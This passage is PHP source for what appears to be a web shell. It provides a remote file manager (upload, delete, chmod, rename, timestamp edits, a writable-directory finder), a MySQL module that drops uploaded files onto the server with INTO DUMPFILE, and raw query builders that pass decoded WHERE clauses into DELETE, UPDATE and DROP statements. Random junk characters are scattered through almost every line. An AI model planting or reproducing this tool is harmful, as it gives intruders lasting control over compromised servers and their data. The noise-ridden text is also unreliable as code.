formfoot();
( N1 ~5 s$ I% e5 ?$ x3 ^
formhead(array('name'=>'rename'));
8 C; z2 V/ m5 D. X! n# L9 Z
makehide('oldname');
7 }/ Q& e7 I: O) b- ^8 `
makehide('newfilename');- n& ?5 f" f$ U1 N
makehide('dir',$nowpath);
5 O) ]+ K6 n- R. t* r @
formfoot();
. t& t" S% ]- P' ^4 c
formhead(array('name'=>'fileopform'));+ u) {/ `4 h( u9 U# w
makehide('action');
) h/ X, q' d0 \7 s [$ R
makehide('opfile');# x( G$ \" h# Z0 L' a/ _
makehide('dir');
formfoot();
6 Y" W2 u; v+ u& c% i! |" b+ L
" ^+ n( E. X1 T3 h7 a
$free = @disk_free_space($nowpath);
" ?6 U) T# q( Z1 a. M
!$free && $free = 0;
2 ~3 b$ g' U0 X2 L3 v& p7 s- e% ^3 I
$all = @disk_total_space($nowpath);7 y2 h3 L- Q% I: g
!$all && $all = 0;
" W' G y" ~- i/ {) W9 \) B
$used = $all-$free;3 A" x2 A+ Z4 {* W
$used_percent = @round(100/($all/$free),2);- D4 k& I9 k7 y: h% Z
p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');- F5 I9 W' `$ {% G
7 S: l7 W2 n9 x( w
?>
/ u/ T# G! W1 c+ d( J
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
/ L0 j9 T. m6 Q, c& X
<form action="" method="post" id="godir" name="godir">7 n- n0 P9 H( o8 @
<tr>
6 @' V! y3 p5 V( X1 _
<td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>/ C2 w9 }! k: @ X
<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
/ s3 q& m, M8 u
<td nowrap><input class="bt" value="GO" type="submit"></td>& }* ?0 C" Q+ U4 @; d+ H6 w2 n9 s
</tr># j; r! \% W* W8 X4 [! S
</form>
0 _$ T+ X, z# Y' `
</table> u( n- H; l# |' K, h& U/ A
<script type="text/javascript">0 [! S+ |/ K! o0 G# W
function createdir(){- f% x- |6 ~& {7 e4 F: b" T$ X# e
var newdirname;1 c: @$ c8 L, D, a v
newdirname = prompt('Please input the directory name:', '');" m* T4 l3 \* w* w) W' {" a
if (!newdirname) return;
5 f+ z' x' A" `% s
$('createdir').newdirname.value=newdirname;
% X( G6 F# M f
$('createdir').submit();
0 V, u! q9 {4 S4 E8 q
}! V. y+ x& ~+ c7 ]) q
function fileperm(pfile){
3 V& d a. w' @0 [5 A4 H& W
var newperm;
% |1 Q: ^3 V. S5 O9 n: J0 P* j% A
newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');: n- g4 w: e% b/ @. K
if (!newperm) return;
2 e9 p2 M, c1 h6 o* b/ i7 n* X6 l- H
$('fileperm').newperm.value=newperm;
* p- h" M$ `0 |- B" W0 j9 C
$('fileperm').pfile.value=pfile;
. t# I# U3 Q6 f' T% ~8 X }2 ^- g
$('fileperm').submit();9 V: }1 V2 E/ z8 y' b7 {5 X
}/ ?0 |- D0 D# C. s, c
function copyfile(sname){
" o2 `2 ^: R# x/ c
var tofile;) p' Q8 Y; N9 R" |1 N
tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
4 U; f, y" ^! x2 e/ u# J5 b7 j" ^
if (!tofile) return;, e! D2 c9 {0 Z8 G: u& e
$('copyfile').tofile.value=tofile;
* v- m! o: _0 c3 B2 w9 u% u( k
$('copyfile').sname.value=sname;
+ e+ h# q2 I+ z
$('copyfile').submit();
; \2 {+ z! T. {! f/ H& y
}/ K4 m/ y* i6 f1 d2 ]. k
function rename(oldname){+ j1 |0 r# T) g( V6 m8 x4 b O
var newfilename;; i( X; W9 M8 N' N! m
newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');) o2 g: Q- f' c/ S
if (!newfilename) return;
9 m( Z5 m8 k& N$ `1 \6 z
$('rename').newfilename.value=newfilename;
8 V1 T+ C/ c* I+ c0 x$ M& `% i" ^
$('rename').oldname.value=oldname;* M" {; f8 v3 n
$('rename').submit();$ H3 O# [$ Y4 H+ J
}
6 p) \" |7 ]6 [7 s2 s
function dofile(doing,thefile,m){
& B! v" ?' n- b, |$ }% G d& ?- u8 O
if (m && !confirm(m)) {
1 |6 |: C$ h+ M) C
return;" R4 t# N: g, D: k3 \, R+ _2 z
}
4 ]. Z4 O' x+ d6 w8 A
$('filelist').doing.value=doing;
' [5 |! O7 G6 l
if (thefile){0 U- v1 i7 [; h9 Q8 Z! }
$('filelist').thefile.value=thefile;
0 y- Y! b! t% R$ T* u
}
$ S) }& x- l% r# U H+ P
$('filelist').submit();
4 ]: C4 W& q: P, O9 {8 {* F
}! O$ ]0 }) W- H3 `
function createfile(nowpath){
% M9 o9 v+ G! Q: J
var filename;
, P8 \' u2 j" c0 n% O6 @/ _
filename = prompt('Please input the file name:', '');
' I) c" r0 R1 @* l7 D t
if (!filename) return; d' W" r+ J* Z ]3 ^2 Z
opfile('editfile',nowpath + filename,nowpath);( o+ E; u- Y0 E7 s/ d
}
1 x) M B! u/ e+ O5 M! F0 S X
function opfile(action,opfile,dir){
! e9 B4 P3 Y0 `/ _$ n+ A4 U
$('fileopform').action.value=action;
9 B( e( E" `. J( ~0 B# |
$('fileopform').opfile.value=opfile;
8 G0 G3 G) x% U1 a# `
$('fileopform').dir.value=dir;0 _9 A$ d2 a1 D8 o! b! ~6 w+ y
$('fileopform').submit();# L, ~& a A' }& G
}
- b0 o. D: Z# ^, q+ W
function godir(dir,view_writable){
9 z# p' _% x1 r- b( b. w
if (view_writable) {
G4 g7 F }8 Z6 C6 ?
$('godir').view_writable.value=1;
- Q% j- A" U6 Y* b
}
4 W n% p9 C2 T' O% G6 E
$('godir').dir.value=dir;3 S* |, v% s. A. f
$('godir').submit();0 @2 o2 e( P) k
}2 r# f; p/ C! |5 {1 `9 x# B! Z
</script>
3 _& O" G6 ?/ _9 W, v$ f( a
<?php
6 O) [/ k, u" t4 b% ?6 e7 X8 p
tbhead();
7 k: @8 _# f% b. X
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
" m; o+ x6 a- O- e: l+ O
p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');+ n! v9 ^0 f! F; f7 b- n: z- J/ F
p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
( f, \; W! E* z2 S
if ($view_writable) {7 J7 y$ ^4 r. k3 _6 n. K9 T
p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
3 _ }! [% B3 \; J/ O
} else {
; h7 ?# r( v/ Q, |
p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
}& m5 X8 n! v' d
p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
2 n5 M" U* _: o9 q
if (IS_WIN && IS_COM) {5 }( A; I \ N `3 \
$obj = new COM('scripting.filesystemobject');; Q2 N' g1 F0 S9 q( i; ^( y* x3 ^
if ($obj && is_object($obj)) {
4 m9 b K3 e7 A6 l0 E; Q) ?. m
$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
! k( Q/ ^, h# q) [
foreach($obj->Drives as $drive) {
1 z7 q5 q; [8 g" y2 x6 l
if ($drive->DriveType == 2) {; E# ], Z! G9 e% W8 l) W; K; o
p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'' s0 R, s; L5 \4 \# z; k
Free:'.sizecount($drive->FreeSpace).'+ z5 W/ Q" j! U1 G
Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
7 \- |4 G9 ~0 `5 W0 r
} else {! z' A+ B" E8 T( q; e+ m/ V
p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');, U- p( ^% B# n( ^
}* ]/ u% U% i9 {: r/ E7 y: ?% z
}
; c! D! ^7 X8 Y6 ^7 i6 u' x. P
}
0 t6 g3 ?7 y' E" o
}
# z8 B% m# u& D6 R
, n- k6 u" Z! A- R' K
p('</td></tr></form>');. {2 o6 V( l c7 b' n6 y& u( b2 s
/ j. M1 o, m; B6 c! F3 y
p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
2 }0 F5 _9 r# Q6 z2 p; Q. }; X+ f
! \9 K! C% O6 |- O% @; D
//查看所有可写文件和目录& z" y$ ^4 H. F) \( h
$dirdata=array();+ o3 f2 V6 x5 g) c" R8 M
$filedata=array();5 u/ S, A% V$ }5 ?
( s8 Q. F" {1 _% S
if ($view_writable) {
5 b) N, {) J9 e) K" Z
$dirdata = GetList($nowpath);
6 Q! ~% f: o5 ^; H+ a4 X/ {
} else {4 `4 c6 C7 f5 k7 h. `
// 目录列表- g# D6 a/ P1 Q* b
$dirs=@opendir($dir);
) ?. J; {" y, Z2 m; e5 g3 N
while ($file=@readdir($dirs)) {: _- Y6 X" p, r. b
$filepath=$nowpath.$file;
- s3 ^1 U# H/ l3 ?2 j- H2 _
if(@is_dir($filepath)){
/ X; Y( ~+ w* B% m/ ^
$dirdb['filename']=$file;
8 Z. O" C% e( S
$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
[$ Q& w: B* B/ M1 j u
$dirdb['dirchmod']=getChmod($filepath);4 u( @# j9 t# P' J. y
$dirdb['dirperm']=getPerms($filepath);
2 E; N, t: [9 [0 w1 w
$dirdb['fileowner']=getUser($filepath);
6 A, o5 l6 v6 h& b
$dirdb['dirlink']=$nowpath;
, P, n& h/ v1 @5 H
$dirdb['server_link']=$filepath;
, P; M- }3 X5 d2 ?
$dirdb['client_link']=ue($filepath);
3 W0 f P" |$ l& s# m( x/ ]
$dirdata[]=$dirdb;5 w# V! K; @ U2 x
} else { ' }) ^" a+ v! \6 q4 O" A
$filedb['filename']=$file;3 f! Y( [ q4 T( q$ ~& \1 a
$filedb['size']=sizecount(@filesize($filepath));
* H, W0 T3 a) h- m4 z
$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));. F2 y, ^, Z2 z- D3 A$ E5 ]" [! l
$filedb['filechmod']=getChmod($filepath);5 V1 h* {$ R1 x* O; O
$filedb['fileperm']=getPerms($filepath);; c& i: n) r w! Z& }
$filedb['fileowner']=getUser($filepath);; Q0 d+ N I$ v* `+ i" M2 ?
$filedb['dirlink']=$nowpath;3 U. T+ @( }" a4 d9 J% k' T3 O$ K
$filedb['server_link']=$filepath; W. I3 k+ n0 J2 p3 w. E. l
$filedb['client_link']=ue($filepath);, p$ |) T5 T5 H. Z1 z( Q& ?
$filedata[]=$filedb;
" ^! R! U# X' I1 l" K* j8 ^
}. w+ o! a/ M: H: q, J, ]) a
}// while9 L) P) @/ b: s* f/ v6 m$ t
unset($dirdb);6 W& o- K) t. u5 c
unset($filedb);+ n) o' [; o S4 o' F
@closedir($dirs);
7 ]& `* s, e n- [. x$ H7 y- }
} w {4 e+ U7 Z/ ?( I4 ?0 W, N
@sort($dirdata);1 \: o" x1 _5 ^6 j0 [4 B
@sort($filedata);' E8 Y: P1 x. U1 p$ K8 S
$dir_i = '0';
& n/ v9 S+ e) L, w% N* x
foreach($dirdata as $key => $dirdb){; i0 N& s* D, k' Y ]$ s4 L( E
if($dirdb['filename']!='..' && $dirdb['filename']!='.') {8 [. p# Q* f/ V0 G' M
$thisbg = bg();3 ?* ], {- v6 _: i' k0 M/ p
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
9 j7 W# v& `( Z) B
p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
0 I/ g' s" v4 t+ [/ N
p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');! ]1 x. z* Q9 ~5 c
p('<td nowrap>'.$dirdb['mtime'].'</td>');5 C2 p/ j. S& s# c$ M
p('<td nowrap>--</td>');
2 h9 a: z" I' S# _& F" w! E$ _
p('<td nowrap>');
$ u* V* N1 Y1 U7 q
p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
8 {. D4 }% @+ `) f" y3 ?0 m
p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');- j; O& C, Q: _/ t+ W( _; x% q
p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
! h) V4 s) |2 {/ k r4 E
p('</tr>');- ~0 c- H! @3 C. T+ E. A: c! H- F
$dir_i++;1 z4 X: y- g" ?1 {5 \8 U: N
} else {- u+ R" s, `; W& p- Z1 r6 h, v1 [6 B
if($dirdb['filename']=='..') {
9 c$ V9 z, r- S0 e6 }" J2 n) i' u
p('<tr class='.bg().'>');: C, q9 s$ k4 R' V. j/ J- L/ _3 h
p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
4 L- c- W3 L: I0 a( Z2 w0 _
p('</tr>');
6 g# v2 {) ~0 o+ F. l+ k( R
}
# [/ T3 H* q8 S! U: O0 q6 ~
}3 d# U7 _2 s' U" F/ X! Y/ _9 G
}( p/ p- g# f* y9 V. W4 p
/ {7 e. z6 B) Q; H: {, I) T0 u
p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');: v1 d. o9 m- j' ^
p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');: d, s( A4 t% O; B5 N+ z. l
makehide('action','file');! O6 p! M5 g; y4 ^( S4 A. b& J
makehide('thefile');- g4 u, V7 i1 _, ]; `2 I \
makehide('doing');
4 m: Q- i/ q% g
makehide('dir',$nowpath);
- Z: x" {- z8 @' h/ L( v5 _
$file_i = '0';, z: |7 m) x9 j' E( s! a/ y
foreach($filedata as $key => $filedb){7 ^/ d8 g" d: E" M' F9 E3 {
if($filedb['filename']!='..' && $filedb['filename']!='.') {+ A: _8 h8 Q8 p' A1 z
$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
) V: Z8 e. ^# Y; J- C& \8 P: s- U
$thisbg = bg();
! ?; v! x& I ^8 e+ W6 b( U+ H
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
4 i/ d! t+ d$ f: y9 W! Q+ F, T" s
p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');3 @$ y2 {% P# w: o# N4 _
p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');9 N+ ^: K* @/ [5 Z
p('<td nowrap>'.$filedb['mtime'].'</td>');) Y4 F2 V0 q9 \
p('<td nowrap>'.$filedb['size'].'</td>');! f1 r2 }7 P& p( p$ G1 [' [: K
p('<td nowrap>');
! ~: A# R, R8 @1 V. k; P/ W( [
p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
4 I K( |4 O* `
p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
; N7 h- ~4 R# e; c( X. ?6 M
p('<td nowrap>');
+ @7 e+ b9 R h. I
p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');2 J7 l7 i% v5 o' @# g* b0 a
p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
: c% B- t- Z! S: G. O/ i# @
p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
% s* n0 C* o3 n
p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');0 }5 w$ i2 i2 I! R P4 Q
p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
3 U$ C$ q) h' M5 {: F
p('</td></tr>');# B e' I& w6 A1 h% |
$file_i++;* m9 _! l- r9 O
}- g- ^6 C4 Y5 }
}# C, I- O7 T1 R( H+ o
p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
4 y7 ~+ F. w) j9 N* V
p('</form></table>');+ R) B0 D! N+ t
}// end dir: o- g- S+ M! l `# o$ r6 i
* v& {% P, O/ p: Y- ~& F6 I
elseif ($action == 'sqlfile') {
/ {3 e+ Z8 x# c
if($doing=="mysqlupload"){# i- B' x4 s3 m! t! y' C' \ e% o# {" m
$file = $_FILES['uploadfile'];" c: ]% D) l. ~0 m$ z3 p. }
$filename = $file['tmp_name'];6 Z( _1 a% m' `* a4 w- i8 U
if (file_exists($savepath)) {) \ s( d1 y: ^. F! o* T
m('The goal file has already existed');
4 o8 Q' z _7 k- r1 U' u: Q* {
} else {
8 x% h" }5 s; h5 T8 ]2 A" X
if(!$filename) {
$ w: K; T N0 w8 _( v7 _
m('Please choose a file');
$ q' F: Q* ?2 v* K) f. C: ^
} else {- n. L# U2 m+ v3 M$ q. j
$fp=@fopen($filename,'r');/ P C" H! ~/ { `' Q
$contents=@fread($fp, filesize($filename));
; |4 d/ D9 C3 g; q, D! E; m9 ^
@fclose($fp);
5 K" M5 n3 s' O
$contents = bin2hex($contents);
2 v |7 \; f0 E' I7 N7 h
if(!$upname) $upname = $file['name'];
' F: T) z& V5 D" D/ A" I$ z8 ]9 `
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);2 b# a* t# d) s6 ~) W! V
$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
$ z5 [: C5 j H
m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());( a+ c/ |- n% A/ w! X+ n
}
/ ]% h. N0 V9 Z0 N7 ^( ]5 B
}
5 ?9 k+ l# M% V8 w" M7 \2 z
}
& x- I8 t# |4 n8 H. q }, c$ t
?>
& L5 N6 H- W/ t( C0 P
<script type="text/javascript">
, V( w! T" S ^
function mysqlfile(doing){7 K6 ?+ J6 `* i4 {
if(!doing) return;- j( N4 P9 g* {4 p
$('doing').value=doing;$ l a+ S" C0 w# J+ h/ J1 x( V
$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
8 ~9 o7 S9 {, a
$('mysqlfile').dbport.value=$('dbinfo').dbport.value;4 O# f: _" ]) |/ V2 D
$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;. H5 z/ m% M+ |5 k" I# r
$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;8 ?$ }6 T' b$ b) G& ]8 p# Q' l
$('mysqlfile').dbname.value=$('dbinfo').dbname.value;& s. D" }2 b6 ~1 t. D% m
$('mysqlfile').charset.value=$('dbinfo').charset.value;/ O) q. C" x7 C. K' Z3 S$ K
$('mysqlfile').submit();
: `# t) a4 D3 g
}6 w+ `, H, ~) L7 c: O% \/ Z/ T- X/ [
</script>7 K0 T5 I5 _5 a: B+ e7 U
<?php
!$dbhost && $dbhost = 'localhost';6 i3 f: _4 s. |# Q; p
!$dbuser && $dbuser = 'root';0 a6 b6 ?4 a7 d8 ?3 @. L6 a
!$dbport && $dbport = '3306';
/ L$ l4 l. B% _) ?
$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
( b! H" t2 f7 U/ P( f9 X
formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));0 n A0 A$ Y+ l0 U/ V
makehide('action','sqlfile');5 x% E8 e( O% g% N0 Y. {
p('<p>');
4 H1 O# B6 @' X1 r
p('DBHost:');8 @$ \6 u& J8 C2 \) I2 B8 @
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
6 `" w- y7 v7 B' K
p(':');% W! _% V, ~6 Y( {
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));( p1 c3 b( s6 l7 \& l( o
p('DBUser:');
& t9 ?' b) w' Q
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
5 V) `5 w |6 ]: y& m
p('DBPass:');
) w/ x9 b$ y, N, t1 _, r7 j
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
( f" e& _$ n& I" Z8 ?1 L! ]; R4 }
p('DBName:');
- ]' v% f: _; r) J0 i0 X' s) U3 |- _
makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
; z( e5 l3 [+ Z, T' `4 _ ` Q
p('DBCharset:');
6 |- P4 p1 d1 y* P8 H) k
makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));+ c5 @, J# @1 b, x/ `' Q
p('</p>');2 U1 {; _8 t) H) ?' t" M# [
formfoot();4 j% T: `# S2 e4 _( M( ?
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');! j- n5 m7 ?& ` Z v3 u2 Z
p('<h2>Upload file</h2>');
- t5 C" u, {0 c$ {
p('<p><b>This operation the DB user must has FILE privilege</b></p>');7 Y# h8 T8 l7 a2 b& H3 q
p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
3 ]7 [, E7 ]( D2 j1 n1 L
p('<h2>Download file</h2>');" w+ c7 [( Y- g! n9 [$ ^! G
p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');5 ^, |& X6 k$ j7 d3 j4 _
makehide('dbhost');
) z! p9 q! W* A; y4 t2 K, ~+ G
makehide('dbport');- D; q; [. ?1 P' E3 I" t
makehide('dbuser');8 t* q3 r8 L2 [) q
makehide('dbpass');
: ?/ k* r: [( J% C* u" g* a
makehide('dbname');
1 e; x. H, c$ c& Y% C
makehide('charset');! t! C& O' p' ]; ^+ Q
makehide('doing');1 H3 K7 J+ Z6 [" {* i
makehide('action','sqlfile');
a2 [) O2 Z( x/ u) b3 {6 V
p('</form>');
8 t8 F$ ]+ ^7 j, y% ?4 k$ d
}, Y! ^; W0 R% x4 x- R5 `
6 f1 ~ g: C9 |) x, P9 |$ p G3 j
elseif ($action == 'sqladmin') {
2 h. j+ x$ d ` g( R+ w( B8 Z
!$dbhost && $dbhost = 'localhost';
' L# [9 A( o: Q. k# C6 l% f8 s
!$dbuser && $dbuser = 'root';* B' J$ n/ e; N" k6 W
!$dbport && $dbport = '3306';( P7 m) U+ L2 }+ `, F
$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';1 [; C( h( B8 S+ ?5 G0 l# M3 E" Y
if(isset($dbhost)){
: D, v3 N- Y9 m) U. u
$dbform .= "<input type="hidden" id="dbhost" name="dbhost" value="$dbhost" />\n";, l' d I" U7 b! J5 ` q0 x5 e
}4 N( p" f- M1 ~ [) m- q9 \9 O
if(isset($dbuser)) {" P" M# B7 Z# E* C4 c3 U
$dbform .= "<input type="hidden" id="dbuser" name="dbuser" value="$dbuser" />\n";
( s; ~6 Q5 l- q' g" [" o
}: W" D8 |+ F" b5 V
if(isset($dbpass)) {
8 L$ ?+ [7 p8 R( w1 b- D
$dbform .= "<input type="hidden" id="dbpass" name="dbpass" value="$dbpass" />\n";
; d9 A" x$ I( W& e
}* K' f. V: _, c" _9 F" D
if(isset($dbport)) {
# Z- h9 z5 ~* m0 W1 v* e
$dbform .= "<input type="hidden" id="dbport" name="dbport" value="$dbport" />\n";
& h" R) o! d' T$ w
}
; M/ y% g# _; o& `4 K% }( C8 n
if(isset($dbname)) {
) b6 [; B: w- }! }/ F
$dbform .= "<input type="hidden" id="dbname" name="dbname" value="$dbname" />\n";% @8 o- S7 I; L! W5 L
}
& y4 l; ~) g4 x' K6 J! P
if(isset($charset)) {
3 Y; {+ K! h+ \7 ]! d% d
$dbform .= "<input type="hidden" id="charset" name="charset" value="$charset" />\n";
3 {- }. B& D( ?* a, V) O5 m
}
- ^7 m8 a ~$ Q! g$ v( O
! b- a7 y3 l. R) D; i1 {9 Y" [5 X
if ($doing == 'backupmysql' && $saveasfile) {
) U$ W& h- v4 ~) q& W
if (!$table) {4 f" h2 O& h9 O5 P+ N" y
m('Please choose the table');1 b A2 _. R* z1 b
} else {
* k6 d n7 }" t X1 t& C
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);2 ^$ A4 O. d' K
$table = array_flip($table);
) F( b9 P* F" j5 ]9 |0 @* T" v+ C
$fp = @fopen($path,'w');/ ~1 `, l$ {0 w" V: g) Z4 v( O
if ($fp) {8 G& m) s7 i7 A/ L' f
$result = q('SHOW tables');/ Q' x0 v! q. q& L5 y: w- _- X" I3 f
if (!$result) p('<h2>'.mysql_error().'</h2>');
/ S& ?+ {! w) Z2 O- y: Z( Y; c
$mysqldata = '';8 j% g9 m$ q3 ^) O# X/ D" ?+ @/ O' h
while ($currow = mysql_fetch_array($result)) {
) y5 b; I) N3 y6 @& o
if (isset($table[$currow[0]])) {
0 L4 r- u- {2 t. q& q- @ `8 D& ]
sqldumptable($currow[0], $fp);* b' D; G& O) e) ]' E2 @% i
}5 Q% h7 E( l! l0 X! ]/ h2 ]3 X
}
6 e4 j* ~+ f3 m! Q3 g5 [
fclose($fp);
1 ^" x' E- ]# T: K1 d; U
$fileurl = str_replace(SA_ROOT,'',$path);) F4 F7 r- r1 ?+ m
m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>'); p% e% s6 J: s; {4 X' F
mysql_close();' @' w& A5 h2 O5 s8 M) J H
} else {
/ n. {$ y: f! U
m('Backup failed');; G# X( X4 S+ ~- w4 S
}
" P0 X" [, H4 {( R5 N* n
}
* Y: k0 N4 _* U" D) u
}
; n6 n/ z5 j- y- o
if ($insert && $insertsql) {" N- m" f9 p, V! R( b" y/ Y
$keystr = $valstr = $tmp = '';# d) u$ A2 \; v) J# C( Q
foreach($insertsql as $key => $val) {
. y0 a ?8 q. O: ]/ P* j
if ($val) {
& J; b& A3 s3 y" A& B- r( j$ P3 B* }
$keystr .= $tmp.$key;. x+ L. F" U' |. J3 y/ I; Y
$valstr .= $tmp."'".addslashes($val)."'";/ Y# ~% l0 x% n/ x0 V
$tmp = ',';! q# i9 x7 n1 ^! F' x
}
& t7 K9 e8 z0 _1 { [
}
2 {0 b# ~* R$ ^: j+ g" t9 e
if ($keystr && $valstr) {; d# d3 z R& M
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$ R. c1 Q7 h+ Y; s
m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());7 e% n1 b7 T( W5 T, J" q) Z- j$ X
}
; V$ x" ]. `0 v2 t' E" X: w
}
' Z: m0 e" Y5 ]2 v$ ~0 |; s$ c
if ($update && $insertsql && $base64) {# g; K# j% Y# M1 t% v8 m
$valstr = $tmp = '';
( _$ g1 s2 [7 K5 h7 X/ T
foreach($insertsql as $key => $val) {1 C* T; H& j' f0 k" N; c$ {
$valstr .= $tmp.$key."='".addslashes($val)."'";
9 L' m: A& ?1 i. m+ m( L" y) L
$tmp = ',';
. w" z1 \2 i# @, V. p) ~
}
. _/ O; b7 R: h: u0 Z$ q+ P
if ($valstr) {
6 X8 n' T0 v) t: B! _9 d# }
$where = base64_decode($base64);$ V; a% q8 ]" f9 E% `) d8 ?, L4 O% c9 w
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);! u# c1 l& Q% o9 q( j& l
m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
; M7 Q& ~; h/ [4 j4 _
}
7 F& x& M+ ?! E
}
+ N2 G+ X8 h. A4 R0 V& X
if ($doing == 'del' && $base64) { R7 v* I' J+ j) `
$where = base64_decode($base64);% @- w7 q& r: |% _
$delete_sql = "DELETE FROM $tablename WHERE $where";
. x2 Q' ]" [+ v: {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);& U. Z; r8 E8 W6 d9 E
m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());/ j0 B' d# N7 u) h3 Z/ r8 H: A
}
, _% c& J+ Q: B9 Q3 i- w
# `1 c2 U% C# R4 n& l; R5 \% o
if ($tablename && $doing == 'drop') {
# D! O! d* [3 `% D$ [
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
2 l" K( o8 s0 F! T6 ~
if (q("DROP TABLE $tablename")) {
- U6 L6 N* u$ y+ P7 y
